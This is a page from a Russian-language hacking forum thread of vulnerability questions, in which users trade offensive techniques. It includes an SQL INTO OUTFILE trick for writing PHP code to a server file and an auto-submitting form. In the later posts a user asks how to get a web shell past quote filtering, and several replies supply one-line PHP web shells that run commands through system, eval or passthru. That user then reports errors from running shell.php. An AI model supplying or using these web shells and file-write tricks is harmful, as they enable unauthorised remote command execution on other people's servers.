Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Это не ответ. Поясни пожалуйста. Насколько мне известно в лимите выражения не работают. Никакие.
     
    2 people like this.
  2. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Поясняю
     
    7 people like this.
  3. vorona

    vorona Member

    Joined:
    7 Sep 2009
    Messages:
    392
    Likes Received:
    7
    Reputations:
    1
    Спасибо. А пример можно?
     
  4. dr.Pilulkin

    dr.Pilulkin Elder - Старейшина

    Joined:
    3 Jun 2007
    Messages:
    42
    Likes Received:
    16
    Reputations:
    0
    Можно отправить с помощью javascript.
    Code:
    <form action="/script.php" method="post">
    <input type="text" name="param" value="lol">
    </form>
    <script language="javascript">
    document.forms[0].submit();
    </script>
    
    Или из строки браузера
    Code:
    javascript:document.forms[номер формы].submit();
    
     
    #9924 dr.Pilulkin, 11 Nov 2009
    Last edited: 11 Nov 2009
  5. vorona

    vorona Member

    Joined:
    7 Sep 2009
    Messages:
    392
    Likes Received:
    7
    Reputations:
    1
    А как с помощью сокета?
     
  6. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    http://rus-phpnuke.com/php/f/fsockopen.html
    vorona темой ошибся
     
  7. vorona

    vorona Member

    Joined:
    7 Sep 2009
    Messages:
    392
    Likes Received:
    7
    Reputations:
    1
    та я везде ошибаюсь. оттуда прогнали, оттуда прогнали... неужеди трудно посоветовать...
     
  8. vorona

    vorona Member

    Joined:
    7 Sep 2009
    Messages:
    392
    Likes Received:
    7
    Reputations:
    1
    и там нету ничего, что мне нужно. те ф-ции я знаю.
    есть скрипт 1.php с ПОСТ-формой. Есть скрипт 2.php , который принимает ПОСТ-запросы с первого. Как без участвия первого, передать ПОСТ-запрос второму?
     
  9. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    Что мешает сделать свою "ПОСТ форму" и отправлять с не запрос на скрипт номер 2 ?
     
  10. Aртем

    Aртем Member

    Joined:
    18 Oct 2009
    Messages:
    53
    Likes Received:
    31
    Reputations:
    5
    как вариант
    PHP:
    <?php
    $ci 
    curl_init(); // открываешь соединение
    curl_setopt($ciCURLOPT_URL"http://сайт_где_находится_скрипт/сам_скрипт.php"); // указывай ссылку на свой скрипт здесь
    curl_setopt($ciCURLOPT_POSTtrue); // выбираешь пост запрос
    curl_setopt($ciCURLOPT_POSTFIELDS"параметр1=значение&параметр2=значение"); // перечесляешь запросы
    curl_exec($ci); // выполняешь запрос, и получешь ответ
    curl_close($ci); // закрываешь соединение
    ?>
     
  11. Train

    Train Member

    Joined:
    9 Jan 2009
    Messages:
    21
    Likes Received:
    10
    Reputations:
    4
    to Qwazar
    Code:
    SELECT id from news ORDER BY 1 LIMIT 1 INTO OUTFILE '/tmp/result11.txt' LINES TERMINATED BY '<?php phpinfo(); ?>' 
    Круто, не знал, не видел никогда. блин круто.

    to vorona
    А еще можно на JS с помощью AJAX обращаться к скрипту пост запросом :)
     
  12. vorona

    vorona Member

    Joined:
    7 Sep 2009
    Messages:
    392
    Likes Received:
    7
    Reputations:
    1
    ничего. но в своей форме опять же нада нажимать на кнопку субмит. ничё не меняется по сути.
     
  13. vorona

    vorona Member

    Joined:
    7 Sep 2009
    Messages:
    392
    Likes Received:
    7
    Reputations:
    1
    спс, попробую таким способом.
     
  14. vorona

    vorona Member

    Joined:
    7 Sep 2009
    Messages:
    392
    Likes Received:
    7
    Reputations:
    1
    Fatal error: Unknown function: curl_init() in T:\home\virtual\site.ru\spam.php on line 2
     
  15. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Синий фломастер пишет белым....


    зы: Мне тоже такие бестолковые посты начинать писать???

    Когда же гугл станет домашней страницей ворон...и других?
     
    #9935 $n@ke, 11 Nov 2009
    Last edited: 11 Nov 2009
    1 person likes this.
  16. Roston

    Roston Elder - Старейшина

    Joined:
    31 Jul 2008
    Messages:
    337
    Likes Received:
    104
    Reputations:
    8
    просто поставь пакет с новым пхп, за одно и его обновиш. на php.net точно он есть
     
  17. sideup

    sideup New Member

    Joined:
    10 Apr 2008
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Добрый день!

    Подскажите пожалуйста

    не могу записать в файл на сервере код CMD

    <?php system($_GET["cmd"]); ?>

    сервер походу фильтрует кавычки.

    Подскажите как это обойти, чтобы получить шелл.

    Или это невозможно?
     
  18. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    PHP:
    <?php system($_GET[cmd]); ?> 
    :(
     
  19. Aртем

    Aртем Member

    Joined:
    18 Oct 2009
    Messages:
    53
    Likes Received:
    31
    Reputations:
    5
    :( печальный вопрос
    Code:
    <?system($_GET[cmd])?> 
    <?eval($_GET[cmd])?>
    <?passthru($_GET[cmd])?>
    <?eval($_REQUEST[cmd])?>
    <?passthru($_REQUEST[cmd])?>
    <?system($_REQUEST[cmd])?>
    и да, мне интересно через что ты заливаешь шелл?
    если через скулинъект, то как бы ты не сможешь вообще ничего залить если у тебя как ты говоришь ГПЦ=ОН
     
    #9939 Aртем, 12 Nov 2009
    Last edited: 12 Nov 2009
    1 person likes this.
  20. sideup

    sideup New Member

    Joined:
    10 Apr 2008
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Warning: Wrong parameter count for system() in

    /home/site-shop.com/site/site/shell.php on line 1

    При выполнении шелла такая ошибка.
     
Thread Status:
Not open for further replies.